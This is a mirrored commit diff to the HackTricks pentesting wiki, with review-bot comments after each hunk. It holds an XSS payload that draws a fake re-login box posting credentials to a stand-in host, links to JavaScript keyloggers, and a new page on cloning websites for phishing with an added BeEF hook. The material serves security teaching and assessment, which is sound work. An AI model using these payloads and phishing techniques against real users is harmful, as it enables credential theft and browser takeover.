mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-25 14:10:41 +00:00
GitBook: [master] 474 pages modified
parent
e765a981c7
commit
87e89bb1a2
3 changed files with 42 additions and 3 deletions
|
@ -1,13 +1,14 @@
|
||||||
# Table of contents
|
# Table of contents
|
||||||
|
|
||||||
* [HackTricks](README.md)
|
* [HackTricks](README.md)
|
||||||
|
* [About the author](about-the-author.md)
|
||||||
* [Getting Started in Hacking](getting-started-in-hacking.md)
|
* [Getting Started in Hacking](getting-started-in-hacking.md)
|
||||||
* [Pentesting Methodology](pentesting-methodology.md)
|
* [Pentesting Methodology](pentesting-methodology.md)
|
||||||
* [External Recon Methodology](external-recon-methodology.md)
|
* [External Recon Methodology](external-recon-methodology.md)
|
||||||
* [Phishing Methodology](phishing-methodology/README.md)
|
* [Phishing Methodology](phishing-methodology/README.md)
|
||||||
|
* [Clone a Website](phishing-methodology/clone-a-website.md)
|
||||||
* [Detecting Phising](phishing-methodology/detecting-phising.md)
|
* [Detecting Phising](phishing-methodology/detecting-phising.md)
|
||||||
* [Phishing Documents](phishing-methodology/phishing-documents.md)
|
* [Phishing Documents](phishing-methodology/phishing-documents.md)
|
||||||
* [About the author](about-the-author.md)
|
|
||||||
* [Exfiltration](exfiltration.md)
|
* [Exfiltration](exfiltration.md)
|
||||||
* [Tunneling and Port Forwarding](tunneling-and-port-forwarding.md)
|
* [Tunneling and Port Forwarding](tunneling-and-port-forwarding.md)
|
||||||
* [Brute Force - CheatSheet](brute-force.md)
|
* [Brute Force - CheatSheet](brute-force.md)
|
||||||
|
|
|
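Review bot: The new `Clone a Website` entry is added directly above `Detecting Phising`, whose label and path (`phishing-methodology/detecting-phising.md`) both still misspell "Phishing"; since this hunk already reorders the table of contents, correct the label and rename the file in the same change so the phishing-methodology links are consistent. `About the author` also moves from after the phishing pages to second position, and nothing in the commit message explains the reorder.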
@ -651,9 +651,11 @@ for(var i=0; i<ports.length; i++) {
|
||||||
}
|
}
|
||||||
```
|
```
|
||||||
|
|
||||||
_Short times indicate a responding port_ _Longer times indicate no response_
|
_Short times indicate a responding port_ _Longer times indicate no response._
|
||||||
|
|
||||||
### Box to as for credentials
|
Review the list of ports banned in Chrome [**here**](https://src.chromium.org/viewvc/chrome/trunk/src/net/base/net_util.cc) and in Firefox [**here**](https://www-archive.mozilla.org/projects/netlib/portbanning#portlist).
|
||||||
|
|
||||||
|
### Box to ask for credentials
|
||||||
|
|
||||||
```markup
|
```markup
|
||||||
<style>::placeholder { color:white; }</style><script>document.write("<div style='position:absolute;top:100px;left:250px;width:400px;background-color:white;height:230px;padding:15px;border-radius:10px;color:black'><form action='https://example.com/'><p>Your sesion has timed out, please login again:</p><input style='width:100%;' type='text' placeholder='Username' /><input style='width: 100%' type='password' placeholder='Password'/><input type='submit' value='Login'></form><p><i>This login box is presented using XSS as a proof-of-concept</i></p></div>")</script>
|
<style>::placeholder { color:white; }</style><script>document.write("<div style='position:absolute;top:100px;left:250px;width:400px;background-color:white;height:230px;padding:15px;border-radius:10px;color:black'><form action='https://example.com/'><p>Your sesion has timed out, please login again:</p><input style='width:100%;' type='text' placeholder='Username' /><input style='width: 100%' type='password' placeholder='Password'/><input type='submit' value='Login'></form><p><i>This login box is presented using XSS as a proof-of-concept</i></p></div>")</script>
|
||||||
|
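Review bot: The added banned-ports line links the Chrome list at a `trunk` path under `src.chromium.org/viewvc` and the Firefox list on `www-archive.mozilla.org`, so neither reference is pinned to a revision and the text does not say how current either list is; link to a fixed revision or state the date the lists were checked. In the same hunk the period is added only after "no response", leaving `_Short times indicate a responding port_` unterminated and both italic sentences run together on one line.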
@ -674,6 +676,15 @@ body:username.value+':'+this.value
|
||||||
|
|
||||||
When any data is introduced in the password field, the username and password is sent to the attackers server, even if the client selects a saved password and don't write anything the credentials will be ex-filtrated.
|
When any data is introduced in the password field, the username and password is sent to the attackers server, even if the client selects a saved password and don't write anything the credentials will be ex-filtrated.
|
||||||
|
|
||||||
|
### Keylogger
|
||||||
|
|
||||||
|
Just searching in github I found a few different ones:
|
||||||
|
|
||||||
|
* [https://github.com/JohnHoder/Javascript-Keylogger](https://github.com/JohnHoder/Javascript-Keylogger)
|
||||||
|
* [https://github.com/rajeshmajumdar/keylogger](https://github.com/rajeshmajumdar/keylogger)
|
||||||
|
* [https://github.com/hakanonymos/JavascriptKeylogger](https://github.com/hakanonymos/JavascriptKeylogger)
|
||||||
|
* You can also use metasploit `http_javascript_keylogger`
|
||||||
|
|
||||||
### XSS - Stealing CSRF tokens
|
### XSS - Stealing CSRF tokens
|
||||||
|
|
||||||
```javascript
|
```javascript
|
||||||
|
|
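Review bot: The new Keylogger section opens with "Just searching in github I found a few different ones" and then lists three repositories with no note on what each one does, how they differ, or whether any of them were reviewed, so a reader cannot tell them apart or judge whether they are safe to run; add a one-line description per link or state explicitly that they are unvetted. "github" and "metasploit" should also be capitalised as GitHub and Metasploit.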
27
phishing-methodology/clone-a-website.md
Normal file
27
phishing-methodology/clone-a-website.md
Normal file
|
@ -0,0 +1,27 @@
|
||||||
|
# Clone a Website
|
||||||
|
|
||||||
|
For a phishing assessment sometimes it might be useful to completely **clone a website**.
|
||||||
|
|
||||||
|
Note that you can add also some payloads to the cloned website like a BeEF hook to "control" the tab of the user.
|
||||||
|
|
||||||
|
There are different tools you can use for this purpose:
|
||||||
|
|
||||||
|
### wget
|
||||||
|
|
||||||
|
```text
|
||||||
|
wget -mk -nH
|
||||||
|
```
|
||||||
|
|
||||||
|
### goclone
|
||||||
|
|
||||||
|
```bash
|
||||||
|
#https://github.com/imthaghost/goclone
|
||||||
|
oclone <url>
|
||||||
|
```
|
||||||
|
|
||||||
|
### Social Engineering Toolit
|
||||||
|
|
||||||
|
```bash
|
||||||
|
#https://github.com/trustedsec/social-engineer-toolkit
|
||||||
|
```
|
||||||
|
|
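Review bot: The goclone block runs `oclone <url>`, which drops the leading `g` from the tool name given in the comment line above it, so the command as written will not be found; it should read `goclone <url>`. In the same file the `wget -mk -nH` line has no URL argument and is fenced as `text` while the other blocks use `bash`, the heading "Social Engineering Toolit" is missing the `k` in "Toolkit", and that section's block holds only the repository URL comment.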